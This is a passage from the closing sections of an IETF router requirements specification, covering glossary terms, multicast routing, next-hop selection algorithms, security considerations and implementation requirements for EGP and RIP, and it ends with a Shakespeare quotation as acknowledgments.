Point to Point Line
A physical medium capable of connecting exactly two systems. In
this document, it is only used to refer to such a line when used
to connect IP entities. See General Purpose Serial Interface.

router
A special-purpose dedicated computer that connects several
networks. Routers switch packets between these networks in a
process known as forwarding. This process may be repeated
several times on a single packet by multiple routers until the
packet can be delivered to the final destination - switching the
packet from router to router to router... until the packet gets
to its destination.

RPF
Reverse Path Forwarding - A method used to deduce the next hops
for broadcast and multicast packets.

Silently Discard
This memo specifies several cases where a router is to Silently
Discard a received packet (or datagram). This means that the
router should discard the packet without further processing, and
that the router will not send any ICMP error message (see
Section [4.3.2]) as a result. However, for diagnosis of
problems, the router should provide the capability of logging
the error (see Section [1.3.3]), including the contents of the
silently discarded packet, and should record the event in a
statistics counter.

Silently Ignore
A router is said to Silently Ignore an error or condition if it
takes no action other than possibly generating an error report
in an error log or through some network management protocol, and
discarding, or ignoring, the source of the error. In
particular, the router does NOT generate an ICMP error message.

Sparse Mode
In multicast forwarding, two paradigms are possible: in Sparse
Mode forwarding, a network layer multicast datagram is forwarded
as a data link layer multicast frame to routers and hosts that
have asked for it. The initial forwarding state is the inverse
of dense-mode in that it assumes no part of the network wants
the data. See Dense Mode.

Specific-destination address
This is defined to be the destination address in the IP header
unless the header contains an IP broadcast or IP multicast
address, in which case the specific-destination is an IP address
assigned to the physical interface on which the packet arrived.

subnet
A portion of a network, which may be a physically independent
network, which shares a network address with other portions of
the network and is distinguished by a subnet number. A subnet
is to a network what a network is to an internet.

subnet number
A part of the internet address that designates a subnet. It is
ignored for the purposes internet routing, but is used for
intranet routing.

TOS
Type Of Service A field in the IP header that represents the
degree of reliability expected from the network layer by the
transport layer or application.

TTL
Time To Live A field in the IP header that represents how long a
packet is considered valid. It is a combination hop count and
timer value.

APPENDIX C. FUTURE DIRECTIONS

This appendix lists work that future revisions of this document may
wish to address.

In the preparation of Router Requirements, we stumbled across several
other architectural issues. Each of these is dealt with somewhat in
the document, but still ought to be classified as an open issue in
the IP architecture.

Most of the he topics presented here generally indicate areas where
the technology is still relatively new and it is not appropriate to
develop specific requirements since the community is still gaining
operational experience.

Other topics represent areas of ongoing research and indicate areas
that the prudent developer would closely monitor.

(1) SNMP Version 2

(2) Additional SNMP MIBs

(7) More detailed requirements for leaking routes between routing
protocols

(8) Router system security

(9) Routing protocol security

(10) Internetwork Protocol layer security. There has been extensive
work refining the security of IP since the original work writing
this document. This security work should be included in here.

(12) Load Splitting

(13) Sending fragments along different paths

(15) Multiple logical (sub)nets on the same wire. Router
Requirements does not require support for this. We made some
attempt to identify pieces of the architecture (e.g., forwarding
of directed broadcasts and issuing of Redirects) where the
wording of the rules has to be done carefully to make the right

thing happen, and tried to clearly distinguish logical
interfaces from physical interfaces. However, we did not study
this issue in detail, and we are not at all confident that all
the rules in the document are correct in the presence of
multiple logical (sub)nets on the same wire.

(15) Congestion control and resource management. On the advice of
the IETF's experts (Mankin and Ramakrishnan) we deprecated
(SHOULD NOT) Source Quench and said little else concrete
(Section 5.3.6).

(16) Developing a Link-Layer requirements document that would be
common for both routers and hosts.

(17) Developing a common PPP LQM algorithm.

(18) Investigate of other information (above and beyond section
[3.2]) that passes between the layers, such as physical network
MTU, mappings of IP precedence to Link Layer priority values,
etc.

(19) Should the Link Layer notify IP if address resolution failed
(just like it notifies IP when there is a Link Layer priority
value problem)?

(20) Should all routers be required to implement a DNS resolver?

(21) Should a human user be able to use a host name anywhere you can
use an IP address when configuring the router? Even in ping and
traceroute?

(22) Almquist's draft ruminations on the next hop and ruminations on
route leaking need to be reviewed, brought up to date, and
published.

(23) Investigation is needed to determine if a redirect message for
precedence is needed or not. If not, are the type-of-service
redirects acceptable?

(24) RIPv2 and RIP+CIDR and variable length network prefixes.

(25) BGP-4 CIDR is going to be important, and everyone is betting on
BGP-4. We can't avoid mentioning it. Probably need to describe
the differences between BGP-3 and BGP-4, and explore upgrade
issues...

(26) Loose Source Route Mobile IP and some multicasting may require
this. Perhaps it should be elevated to a SHOULD (per Fred

Baker's Suggestion).

APPENDIX D. Multicast Routing Protocols

Multicasting is a relatively new technology within the Internet
Protocol family. It is not widely deployed or commonly in use yet.
Its importance, however, is expected to grow over the coming years.

This Appendix describes some of the technologies being investigated
for routing multicasts through the Internet.

A diligent implementor will keep abreast of developments in this area
to properly develop multicast facilities.

This Appendix does not specify any standards or requirements.

D.1 Introduction

Multicast routing protocols enable the forwarding of IP multicast
datagrams throughout a TCP/IP internet. Generally these algorithms
forward the datagram based on its source and destination addresses.
Additionally, the datagram may need to be forwarded to several
multicast group members, at times requiring the datagram to be
replicated and sent out multiple interfaces.

The state of multicast routing protocols is less developed than the
protocols available for the forwarding of IP unicasts. Three
experimental multicast routing protocols have been documented for
TCP/IP. Each uses the IGMP protocol (discussed in Section [4.4]) to
monitor multicast group membership.

D.2 Distance Vector Multicast Routing Protocol - DVMRP

DVMRP, documented in [ROUTE:9], is based on Distance Vector or
Bellman-Ford technology. It routes multicast datagrams only, and
does so within a single Autonomous System. DVMRP is an
implementation of the Truncated Reverse Path Broadcasting algorithm
described in [ROUTE:10]. In addition, it specifies the tunneling of
IP multicasts through non-multicast-routing-capable IP domains.

D.3 Multicast Extensions to OSPF - MOSPF

MOSPF, currently under development, is a backward-compatible addition
to OSPF that allows the forwarding of both IP multicasts and unicasts
within an Autonomous System. MOSPF routers can be mixed with OSPF
routers within a routing domain, and they will interoperate in the
forwarding of unicasts. OSPF is a link-state or SPF-based protocol.

By adding link state advertisements that pinpoint group membership,
MOSPF routers can calculate the path of a multicast datagram as a
tree rooted at the datagram source. Those branches that do not
contain group members can then be discarded, eliminating unnecessary
datagram forwarding hops.

D.4 Protocol Independent Multicast - PIM

PIM, currently under development, is a multicast routing protocol
that runs over an existing unicast infrastructure. PIM provides for
both dense and sparse group membership. It is different from other
protocols, since it uses an explicit join model for sparse groups.
Joining occurs on a shared tree and can switch to a per-source tree.
Where bandwidth is plentiful and group membership is dense, overhead
can be reduced by flooding data out all links and later pruning
exception cases where there are no group members.

APPENDIX E Additional Next-Hop Selection Algorithms

Section [5.2.4.3] specifies an algorithm that routers ought to use
when selecting a next-hop for a packet.

This appendix provides historical perspective for the next-hop
selection problem. It also presents several additional pruning rules
and next-hop selection algorithms that might be found in the
Internet.

This appendix presents material drawn from an earlier, unpublished,
work by Philip Almquist; Ruminations on the Next Hop.

This Appendix does not specify any standards or requirements.

E.1. Some Historical Perspective

It is useful to briefly review the history of the topic, beginning
with what is sometimes called the "classic model" of how a router
makes routing decisions. This model predates IP. In this model, a
router speaks some single routing protocol such as RIP. The protocol
completely determines the contents of the router's Forwarding
Information Base (FIB). The route lookup algorithm is trivial: the
router looks in the FIB for a route whose destination attribute
exactly matches the network prefix portion of the destination address
in the packet. If one is found, it is used; if none is found, the
destination is unreachable. Because the routing protocol keeps at
most one route to each destination, the problem of what to do when
there are multiple routes that match the same destination cannot
arise.

Over the years, this classic model has been augmented in small ways.
With the deployment of default routes, subnets, and host routes, it
became possible to have more than one routing table entry which in
some sense matched the destination. This was easily resolved by a
consensus that there was a hierarchy of routes: host routes should be
preferred over subnet routes, subnet routes over net routes, and net
routes over default routes.

With the deployment of technologies supporting variable length subnet
masks (variable length network prefixes), the general approach
remained the same although its description became a little more
complicated; network prefixes were introduced as a conscious
simplification and regularization of the architecture. We now say
that each route to a network prefix route has a prefix length
associated with it. This prefix length indicates the number of bits
in the prefix. This may also be represented using the classical
subnet mask. A route cannot be used to route a packet unless each
significant bit in the route's network prefix matches the
corresponding bit in the packet's destination address. Routes with
more bits set in their masks are preferred over routes that have
fewer bits set in their masks. This is simply a generalization of
the hierarchy of routes described above, and will be referred to for
the rest of this memo as choosing a route by preferring longest
match.

Another way the classic model has been augmented is through a small
amount of relaxation of the notion that a routing protocol has
complete control over the contents of the routing table. First,
static routes were introduced. For the first time, it was possible
to simultaneously have two routes (one dynamic and one static) to the
same destination. When this happened, a router had to have a policy
(in some cases configurable, and in other cases chosen by the author
of the router's software) which determined whether the static route
or the dynamic route was preferred. However, this policy was only
used as a tie-breaker when longest match didn't uniquely determine
which route to use. Thus, for example, a static default route would
never be preferred over a dynamic net route even if the policy
preferred static routes over dynamic routes.

The classic model had to be further augmented when inter-domain
routing protocols were invented. Traditional routing protocols came
to be called "interior gateway protocols" (IGPs), and at each
Internet site there was a strange new beast called an "exterior
gateway", a router that spoke EGP to several "BBN Core Gateways" (the
routers that made up the Internet backbone at the time) at the same
time as it spoke its IGP to the other routers at its site. Both
protocols wanted to determine the contents of the router's routing
table. Theoretically, this could result in a router having three

routes (EGP, IGP, and static) to the same destination. Because of
the Internet topology at the time, it was resolved with little debate
that routers would be best served by a policy of preferring IGP
routes over EGP routes. However, the sanctity of longest match
remained unquestioned: a default route learned from the IGP would
never be preferred over a net route from learned EGP.

Although the Internet topology, and consequently routing in the
Internet, have evolved considerably since then, this slightly
augmented version of the classic model has survived intact to this
day in the Internet (except that BGP has replaced EGP). Conceptually
(and often in implementation) each router has a routing table and one
or more routing protocol processes. Each of these processes can add
any entry that it pleases, and can delete or modify any entry that it
has created. When routing a packet, the router picks the best route
using longest match, augmented with a policy mechanism to break ties.
Although this augmented classic model has served us well, it has a
number of shortcomings:

o It ignores (although it could be augmented to consider) path
characteristics such as quality of service and MTU.

o It doesn't support routing protocols (such as OSPF and Integrated
IS-IS) that require route lookup algorithms different than pure
longest match.

o There has not been a firm consensus on what the tie-breaking
mechanism ought to be. Tie-breaking mechanisms have often been
found to be difficult if not impossible to configure in such a way
that the router will always pick what the network manger considers
to be the "correct" route.

E.2. Additional Pruning Rules

Section [5.2.4.3] defined several pruning rules to use to select
routes from the FIB. There are other rules that could also be
used.

o OSPF Route Class
Routing protocols that have areas or make a distinction between
internal and external routes divide their routes into classes
by the type of information used to calculate the route. A
route is always chosen from the most preferred class unless
none is available, in which case one is chosen from the second
most preferred class, and so on. In OSPF, the classes (in
order from most preferred to least preferred) are intra-area,
inter-area, type 1 external (external routes with internal
metrics), and type 2 external. As an additional wrinkle, a

router is configured to know what addresses ought to be
accessible using intra-area routes, and will not use inter-
area or external routes to reach these destinations even when
no intra-area route is available.

More precisely, we assume that each route has a class
attribute, called route.class, which is assigned by the routing
protocol. The set of candidate routes is examined to determine
if it contains any for which route.class = intra-area. If so,
all routes except those for which route.class = intra-area are
discarded. Otherwise, router checks whether the packet's
destination falls within the address ranges configured for the
local area. If so, the entire set of candidate routes is
deleted. Otherwise, the set of candidate routes is examined to
determine if it contains any for which route.class = inter-
area. If so, all routes except those for which route.class =
inter-area are discarded. Otherwise, the set of candidate
routes is examined to determine if it contains any for which
route.class = type 1 external. If so, all routes except those
for which route.class = type 1 external are discarded.

o IS-IS Route Class
IS-IS route classes work identically to OSPF's. However, the
set of classes defined by Integrated IS-IS is different, such
that there isn't a one-to-one mapping between IS-IS route
classes and OSPF route classes. The route classes used by
Integrated IS-IS are (in order from most preferred to least
preferred) intra-area, inter-area, and external.

The Integrated IS-IS internal class is equivalent to the OSPF
internal class. Likewise, the Integrated IS-IS external class
is equivalent to OSPF's type 2 external class. However,
Integrated IS-IS does not make a distinction between inter-area
routes and external routes with internal metrics - both are
considered to be inter-area routes. Thus, OSPF prefers true
inter-area routes over external routes with internal metrics,
whereas Integrated IS-IS gives the two types of routes equal
preference.

o IDPR Policy
A specific case of Policy. The IETF's Inter-domain Policy
Routing Working Group is devising a routing protocol called
Inter-Domain Policy Routing (IDPR) to support true policy-based
routing in the Internet. Packets with certain combinations of
header attributes (such as specific combinations of source and
destination addresses or special IDPR source route options) are
required to use routes provided by the IDPR protocol. Thus,
unlike other Policy pruning rules, IDPR Policy would have to be

applied before any other pruning rules except Basic Match.

Specifically, IDPR Policy examines the packet being forwarded
to ascertain if its attributes require that it be forwarded
using policy-based routes. If so, IDPR Policy deletes all
routes not provided by the IDPR protocol.

E.3 Some Route Lookup Algorithms

This section examines several route lookup algorithms that are in
use or have been proposed. Each is described by giving the
sequence of pruning rules it uses. The strengths and weaknesses
of each algorithm are presented

E.3.1 The Revised Classic Algorithm

The Revised Classic Algorithm is the form of the traditional
algorithm that was discussed in Section [E.1]. The steps of this
algorithm are:

1. Basic match
2. Longest match
3. Best metric
4. Policy

Some implementations omit the Policy step, since it is needed only
when routes may have metrics that are not comparable (because they
were learned from different routing domains).

The advantages of this algorithm are:

(1) It is widely implemented.

(2) Except for the Policy step (which an implementor can choose to
make arbitrarily complex) the algorithm is simple both to
understand and to implement.

Its disadvantages are:

(1) It does not handle IS-IS or OSPF route classes, and therefore
cannot be used for Integrated IS-IS or OSPF.

(2) It does not handle TOS or other path attributes.

(3) The policy mechanisms are not standardized in any way, and are
therefore are often implementation-specific. This causes
extra work for implementors (who must invent appropriate
policy mechanisms) and for users (who must learn how to use

the mechanisms. This lack of a standardized mechanism also
makes it difficult to build consistent configurations for
routers from different vendors. This presents a significant
practical deterrent to multi-vendor interoperability.

(4) The proprietary policy mechanisms currently provided by
vendors are often inadequate in complex parts of the
Internet.

(5) The algorithm has not been written down in any generally
available document or standard. It is, in effect, a part of
the Internet Folklore.

E.3.2 The Variant Router Requirements Algorithm

Some Router Requirements Working Group members have proposed a
slight variant of the algorithm described in the Section
[5.2.4.3]. In this variant, matching the type of service
requested is considered to be more important, rather than less
important, than matching as much of the destination address as
possible. For example, this algorithm would prefer a default
route that had the correct type of service over a network route
that had the default type of service, whereas the algorithm in
[5.2.4.3] would make the opposite choice.

The steps of the algorithm are:

1. Basic match
2. Weak TOS
3. Longest match
4. Best metric
5. Policy

Debate between the proponents of this algorithm and the regular
Router Requirements Algorithm suggests that each side can show
cases where its algorithm leads to simpler, more intuitive routing
than the other's algorithm does. This variant has the same set of
advantages and disadvantages that the algorithm specified in
[5.2.4.3] does, except that pruning on Weak TOS before pruning on
Longest Match makes this algorithm less compatible with OSPF and
Integrated IS-IS than the standard Router Requirements Algorithm.

E.3.3 The OSPF Algorithm

OSPF uses an algorithm that is virtually identical to the Router
Requirements Algorithm except for one crucial difference: OSPF
considers OSPF route classes.

The algorithm is:

1. Basic match
2. OSPF route class
3. Longest match
4. Weak TOS
5. Best metric
6. Policy

Type of service support is not always present. If it is not
present then, of course, the fourth step would be omitted

This algorithm has some advantages over the Revised Classic
Algorithm:

(1) It supports type of service routing.

(2) Its rules are written down, rather than merely being a part of
the Internet folklore.

(3) It (obviously) works with OSPF.

However, this algorithm also retains some of the disadvantages of
the Revised Classic Algorithm:

(1) Path properties other than type of service (e.g., MTU) are
ignored.

(2) As in the Revised Classic Algorithm, the details (or even the
existence) of the Policy step are left to the discretion of
the implementor.

The OSPF Algorithm also has a further disadvantage (which is not
shared by the Revised Classic Algorithm). OSPF internal (intra-
area or inter-area) routes are always considered to be superior to
routes learned from other routing protocols, even in cases where
the OSPF route matches fewer bits of the destination address.
This is a policy decision that is inappropriate in some networks.

Finally, it is worth noting that the OSPF Algorithm's TOS support
suffers from a deficiency in that routing protocols that support
TOS are implicitly preferred when forwarding packets that have
non-zero TOS values. This may not be appropriate in some cases.

E.3.4 The Integrated IS-IS Algorithm

Integrated IS-IS uses an algorithm that is similar to but not quite
identical to the OSPF Algorithm. Integrated IS-IS uses a different
set of route classes, and differs slightly in its handling of type of
service. The algorithm is:

1. Basic Match
2. IS-IS Route Classes
3. Longest Match
4. Weak TOS
5. Best Metric
6. Policy

Although Integrated IS-IS uses Weak TOS, the protocol is only capable
of carrying routes for a small specific subset of the possible values
for the TOS field in the IP header. Packets containing other values
in the TOS field are routed using the default TOS.

Type of service support is optional; if disabled, the fourth step
would be omitted. As in OSPF, the specification does not include the
Policy step.

This algorithm has some advantages over the Revised Classic
Algorithm:

(1) It supports type of service routing.
(2) Its rules are written down, rather than merely being a part of
the Internet folklore.
(3) It (obviously) works with Integrated IS-IS.

However, this algorithm also retains some of the disadvantages of the
Revised Classic Algorithm:

(1) Path properties other than type of service (e.g., MTU) are
ignored.
(2) As in the Revised Classic Algorithm, the details (or even the
existence) of the Policy step are left to the discretion of the
implementor.
(3) It doesn't work with OSPF because of the differences between IS-
IS route classes and OSPF route classes. Also, because IS-IS
supports only a subset of the possible TOS values, some obvious
implementations of the Integrated IS-IS algorithm would not
support OSPF's interpretation of TOS.

The Integrated IS-IS Algorithm also has a further disadvantage (which
is not shared by the Revised Classic Algorithm): IS-IS internal
(intra-area or inter-area) routes are always considered to be

superior to routes learned from other routing protocols, even in
cases where the IS-IS route matches fewer bits of the destination
address and doesn't provide the requested type of service. This is a
policy decision that may not be appropriate in all cases.

Finally, it is worth noting that the Integrated IS-IS Algorithm's TOS
support suffers from the same deficiency noted for the OSPF
Algorithm.

Security Considerations

Although the focus of this document is interoperability rather than
security, there are obviously many sections of this document that
have some ramifications on network security.

Security means different things to different people. Security from a
router's point of view is anything that helps to keep its own
networks operational and in addition helps to keep the Internet as a
whole healthy. For the purposes of this document, the security
services we are concerned with are denial of service, integrity, and
authentication as it applies to the first two. Privacy as a security
service is important, but only peripherally a concern of a router -
at least as of the date of this document.

In several places in this document there are sections entitled ...
Security Considerations. These sections discuss specific
considerations that apply to the general topic under discussion.

Rarely does this document say do this and your router/network will be
secure. More likely, it says this is a good idea and if you do it,
it *may* improve the security of the Internet and your local system
in general.

Unfortunately, this is the state-of-the-art AT THIS TIME. Few if any
of the network protocols a router is concerned with have reasonable,
built-in security features. Industry and the protocol designers have
been and are continuing to struggle with these issues. There is
progress, but only small baby steps such as the peer-to-peer
authentication available in the BGP and OSPF routing protocols.

In particular, this document notes the current research into
developing and enhancing network security. Specific areas of
research, development, and engineering that are underway as of this
writing (December 1993) are in IP Security, SNMP Security, and common
authentication technologies.

Notwithstanding all the above, there are things both vendors and
users can do to improve the security of their router. Vendors should

get a copy of Trusted Computer System Interpretation [INTRO:8]. Even
if a vendor decides not to submit their device for formal
verification under these guidelines, the publication provides
excellent guidance on general security design and practices for
computing devices.

APPENDIX F: HISTORICAL ROUTING PROTOCOLS

Certain routing protocols are common in the Internet, but the authors
of this document cannot in good conscience recommend their use. This
is not because they do not work correctly, but because the
characteristics of the Internet assumed in their design (simple
routing, no policy, a single "core router" network under common
administration, limited complexity, or limited network diameter) are
not attributes of today's Internet. Those parts of the Internet that
still use them are generally limited "fringe" domains with limited
complexity.

As a matter of good faith, collected wisdom concerning their
implementation is recorded in this section.

F.1 EXTERIOR GATEWAY PROTOCOL - EGP

F.1.1 Introduction

The Exterior Gateway Protocol (EGP) specifies an EGP that is used to
exchange reachability information between routers of the same or
differing autonomous systems. EGP is not considered a routing
protocol since there is no standard interpretation (i.e. metric) for
the distance fields in the EGP update message, so distances are
comparable only among routers of the same AS. It is however designed
to provide high-quality reachability information, both about neighbor
routers and about routes to non-neighbor routers.

EGP is defined by [ROUTE:6]. An implementor almost certainly wants
to read [ROUTE:7] and [ROUTE:8] as well, for they contain useful
explanations and background material.

DISCUSSION
The present EGP specification has serious limitations, most
importantly a restriction that limits routers to advertising only
those networks that are reachable from within the router's
autonomous system. This restriction against propagating third
party EGP information is to prevent long-lived routing loops.
This effectively limits EGP to a two-level hierarchy.

RFC-975 is not a part of the EGP specification, and should be
ignored.

F.1.2 Protocol Walk-through

Indirect Neighbors: RFC-888, page 26

An implementation of EGP MUST include indirect neighbor
support.

Polling Intervals: RFC-904, page 10

The interval between Hello command retransmissions and the
interval between Poll retransmissions SHOULD be configurable
but there MUST be a minimum value defined.

The interval at which an implementation will respond to Hello
commands and Poll commands SHOULD be configurable but there
MUST be a minimum value defined.

Network Reachability: RFC-904, page 15

An implementation MUST default to not providing the external list of
routers in other autonomous systems; only the internal list of
routers together with the nets that are reachable through those
routers should be included in an Update Response/Indication packet.
However, an implementation MAY elect to provide a configuration
option enabling the external list to be provided. An implementation
MUST NOT include in the external list routers that were learned
through the external list provided by a router in another autonomous
system. An implementation MUST NOT send a network back to the
autonomous system from which it is learned, i.e. it MUST do split-
horizon on an autonomous system level.

If more than 255 internal or 255 external routers need to be
specified in a Network Reachability update, the networks reachable
from routers that can not be listed MUST be merged into the list for
one of the listed routers. Which of the listed routers is chosen for
this purpose SHOULD be user configurable, but SHOULD default to the
source address of the EGP update being generated.

An EGP update contains a series of blocks of network numbers, where
each block contains a list of network numbers reachable at a
particular distance through a particular router. If more than 255
networks are reachable at a particular distance through a particular
router, they are split into multiple blocks (all of which have the
same distance). Similarly, if more than 255 blocks are required to
list the networks reachable through a particular router, the router's
address is listed as many times as necessary to include all the
blocks in the update.

Unsolicited Updates: RFC-904, page 16

If a network is shared with the peer, an implementation MUST send an
unsolicited update upon entry to the Up state if the source network
is the shared network.

Neighbor Reachability: RFC-904, page 6, 13-15

The table on page 6 that describes the values of j and k (the
neighbor up and down thresholds) is incorrect. It is reproduced
correctly here:

Name Active Passive Description
-----------------------------------------------
j 3 1 neighbor-up threshold
k 1 0 neighbor-down threshold

The value for k in passive mode also specified incorrectly in RFC-
904, page 14 The values in parenthesis should read:

(j = 1, k = 0, and T3/T1 = 4)

As an optimization, an implementation can refrain from sending a
Hello command when a Poll is due. If an implementation does so, it
SHOULD provide a user configurable option to disable this
optimization.

Abort timer: RFC-904, pages 6, 12, 13

An EGP implementation MUST include support for the abort timer (as
documented in section 4.1.4 of RFC-904). An implementation SHOULD
use the abort timer in the Idle state to automatically issue a Start
event to restart the protocol machine. Recommended values are P4 for
a critical error (Administratively prohibited, Protocol Violation and
Parameter Problem) and P5 for all others. The abort timer SHOULD NOT
be started when a Stop event was manually initiated (such as through
a network management protocol).

Cease command received in Idle state: RFC-904, page 13

When the EGP state machine is in the Idle state, it MUST reply to
Cease commands with a Cease-ack response.

Hello Polling Mode: RFC-904, page 11

An EGP implementation MUST include support for both active and
passive polling modes.

Neighbor Acquisition Messages: RFC-904, page 18

As noted the Hello and Poll Intervals should only be present in
Request and Confirm messages. Therefore the length of an EGP
Neighbor Acquisition Message is 14 bytes for a Request or Confirm
message and 10 bytes for a Refuse, Cease or Cease-ack message.
Implementations MUST NOT send 14 bytes for Refuse, Cease or Cease-ack
messages but MUST allow for implementations that send 14 bytes for
these messages.

Sequence Numbers: RFC-904, page 10

Response or indication packets received with a sequence number not
equal to S MUST be discarded. The send sequence number S MUST be
incremented just before the time a Poll command is sent and at no
other times.

F.2 ROUTING INFORMATION PROTOCOL - RIP

F.2.1 Introduction

RIP is specified in [ROUTE:3]. Although RIP is still quite important
in the Internet, it is being replaced in sophisticated applications
by more modern IGPs such as the ones described above. A router
implementing RIP SHOULD implement RIP Version 2 [ROUTE:?], as it
supports CIDR routes. If occasional access networking is in use, a
router implementing RIP SHOULD implement Demand RIP [ROUTE:?].

Another common use for RIP is as a router discovery protocol.
Section [4.3.3.10] briefly touches upon this subject.

F.2.2 Protocol Walk-Through

Dealing with changes in topology: [ROUTE:3], page 11

An implementation of RIP MUST provide a means for timing out
routes. Since messages are occasionally lost, implementations
MUST NOT invalidate a route based on a single missed update.

Implementations MUST by default wait six times the update
interval before invalidating a route. A router MAY have
configuration options to alter this value.

DISCUSSION
It is important to routing stability that all routers in a RIP
autonomous system use similar timeout value for invalidating
routes, and therefore it is important that an implementation
default to the timeout value specified in the RIP specification.

However, that timeout value is too conservative in environments
where packet loss is reasonably rare. In such an environment, a
network manager may wish to be able to decrease the timeout period
to promote faster recovery from failures.

IMPLEMENTATION
There is a very simple mechanism that a router may use to meet the
requirement to invalidate routes promptly after they time out.
Whenever the router scans the routing table to see if any routes
have timed out, it also notes the age of the least recently
updated route that has not yet timed out. Subtracting this age
from the timeout period gives the amount of time until the router
again needs to scan the table for timed out routes.

Split Horizon: [ROUTE:3], page 14-15

An implementation of RIP MUST implement split horizon, a scheme used
for avoiding problems caused by including routes in updates sent to
the router from which they were learned.

An implementation of RIP SHOULD implement Split horizon with poisoned
reverse, a variant of split horizon that includes routes learned from
a router sent to that router, but sets their metric to infinity.
Because of the routing overhead that may be incurred by implementing
split horizon with poisoned reverse, implementations MAY include an
option to select whether poisoned reverse is in effect. An
implementation SHOULD limit the time in which it sends reverse routes
at an infinite metric.

IMPLEMENTATION
Each of the following algorithms can be used to limit the time for
which poisoned reverse is applied to a route. The first algorithm
is more complex but does a more thorough job of limiting poisoned
reverse to only those cases where it is necessary.

The goal of both algorithms is to ensure that poison reverse is
done for any destination whose route has changed in the last Route
Lifetime (typically 180 seconds), unless it can be sure that the
previous route used the same output interface. The Route Lifetime
is used because that is the amount of time RIP will keep around an
old route before declaring it stale.

The time intervals (and derived variables) used in the following
algorithms are as follows:

Tu The Update Timer; the number of seconds between RIP updates.
This typically defaults to 30 seconds.

Rl The Route Lifetime, in seconds. This is the amount of time
that a route is presumed to be good, without requiring an
update. This typically defaults to 180 seconds.

Ul The Update Loss; the number of consecutive updates that have to
be lost or fail to mention a route before RIP deletes the
route. Ul is calculated to be (Rl/Tu)+1. The +1 is to
account for the fact that the first time the ifcounter is
decremented will be less than Tu seconds after it is
initialized. Typically, Ul will be 7: (180/30)+1.

In The value to set ifcounter to when a destination is newly
learned. This value is Ul-4, where the 4 is RIP's garbage
collection timer/30

The first algorithm is:

- Associated with each destination is a counter, called the
ifcounter below. Poison reverse is done for any route whose
destination's ifcounter is greater than zero.

- After a regular (not triggered or in response to a request)
update is sent, all the non-zero ifcounters are decremented by
one.

- When a route to a destination is created, its ifcounter is set
as follows:

- If the new route is superseding a valid route, and the old
route used a different (logical) output interface, then the
ifcounter is set to Ul.

- If the new route is superseding a stale route, and the old
route used a different (logical) output interface, then the
ifcounter is set to MAX(0, Ul - INT(seconds that the route
has been stale/Ut).

- If there was no previous route to the destination, the
ifcounter is set to In.

- Otherwise, the ifcounter is set to zero

- RIP also maintains a timer, called the resettimer below. Poison
reverse is done on all routes whenever resettimer has not
expired (regardless of the ifcounter values).

- When RIP is started, restarted, reset, or otherwise has its
routing table cleared, it sets the resettimer to go off in Rl
seconds.

The second algorithm is identical to the first except that:

- The rules which set the ifcounter to non-zero values are changed
to always set it to Rl/Tu, and

- The resettimer is eliminated.

Triggered updates: [ROUTE:3], page 15-16; page 29

Triggered updates (also called flash updates) are a mechanism for
immediately notifying a router's neighbors when the router adds or
deletes routes or changes their metrics. A router MUST send a
triggered update when routes are deleted or their metrics are
increased. A router MAY send a triggered update when routes are
added or their metrics decreased.

Since triggered updates can cause excessive routing overhead,
implementations MUST use the following mechanism to limit the
frequency of triggered updates:

(1) When a router sends a triggered update, it sets a timer to a
random time between one and five seconds in the future. The
router must not generate additional triggered updates before
this timer expires.

(2) If the router would generate a triggered update during this
interval it sets a flag indicating that a triggered update is
desired. The router also logs the desired triggered update.

(3) When the triggered update timer expires, the router checks the
triggered update flag. If the flag is set then the router
sends a single triggered update which includes all the
changes that were logged. The router then clears the flag
and, since a triggered update was sent, restarts this
algorithm.

(4) The flag is also cleared whenever a regular update is sent.

Triggered updates SHOULD include all routes that have changed
since the most recent regular (non-triggered) update. Triggered
updates MUST NOT include routes that have not changed since the
most recent regular update.

DISCUSSION
Sending all routes, whether they have changed recently or not, is
unacceptable in triggered updates because the tremendous size of
many Internet routing tables could otherwise result in
considerable bandwidth being wasted on triggered updates.

Use of UDP: [ROUTE:3], page 18-19.

RIP packets sent to an IP broadcast address SHOULD have their initial
TTL set to one.

Note that to comply with Section [6.1] of this memo, a router SHOULD
use UDP checksums in RIP packets that it originates, MUST discard RIP
packets received with invalid UDP checksums, but MUST NOT discard
received RIP packets simply because they do not contain UDP
checksums.

Addressing Considerations: [ROUTE:3], page 22

A RIP implementation SHOULD support host routes. If it does not, it
MUST (as described on page 27 of [ROUTE:3]) ignore host routes in
received updates. A router MAY log ignored hosts routes.

The special address 0.0.0.0 is used to describe a default route. A
default route is used as the route of last resort (i.e., when a route
to the specific net does not exist in the routing table). The router
MUST be able to create a RIP entry for the address 0.0.0.0.

Input Processing - Response: [ROUTE:3], page 26

When processing an update, the following validity checks MUST be
performed:

o The response MUST be from UDP port 520.

o The source address MUST be on a directly connected subnet (or on a
directly connected, non-subnetted network) to be considered valid.

o The source address MUST NOT be one of the router's addresses.

DISCUSSION
Some networks, media, and interfaces allow a sending node to
receive packets that it broadcasts. A router must not accept its
own packets as valid routing updates and process them. The last
requirement prevents a router from accepting its own routing
updates and processing them (on the assumption that they were sent
by some other router on the network).

An implementation MUST NOT replace an existing route if the metric
received is equal to the existing metric except in accordance with
the following heuristic.

An implementation MAY choose to implement the following heuristic to
deal with the above situation. Normally, it is useless to change the
route to a network from one router to another if both are advertised
at the same metric. However, the route being advertised by one of
the routers may be in the process of timing out. Instead of waiting
for the route to timeout, the new route can be used after a specified
amount of time has elapsed. If this heuristic is implemented, it
MUST wait at least halfway to the expiration point before the new
route is installed.

F.2.3 Specific Issues

RIP Shutdown

An implementation of RIP SHOULD provide for a graceful shutdown
using the following steps:

(1) Input processing is terminated,

(2) Four updates are generated at random intervals of between two
and four seconds, These updates contain all routes that were
previously announced, but with some metric changes. Routes
that were being announced at a metric of infinity should
continue to use this metric. Routes that had been announced
with a non-infinite metric should be announced with a metric
of 15 (infinity - 1).

DISCUSSION
The metric used for the above really ought to be 16 (infinity);
setting it to 15 is a kludge to avoid breaking certain old hosts
that wiretap the RIP protocol. Such a host will (erroneously)
abort a TCP connection if it tries to send a datagram on the
connection while the host has no route to the destination (even if
the period when the host has no route lasts only a few seconds
while RIP chooses an alternate path to the destination).

RIP Split Horizon and Static Routes

Split horizon SHOULD be applied to static routes by default. An
implementation SHOULD provide a way to specify, per static route,
that split horizon should not be applied to this route.

F.3 GATEWAY TO GATEWAY PROTOCOL - GGP

The Gateway to Gateway protocol is considered obsolete and SHOULD NOT
be implemented.

Acknowledgments

O that we now had here
But one ten thousand of those men in England
That do no work to-day!

What's he that wishes so?
My cousin Westmoreland? No, my fair cousin:
If we are mark'd to die, we are enow
To do our country loss; and if to live,
The fewer men, the greater share of honour.
God's will! I pray thee, wish not one man more.
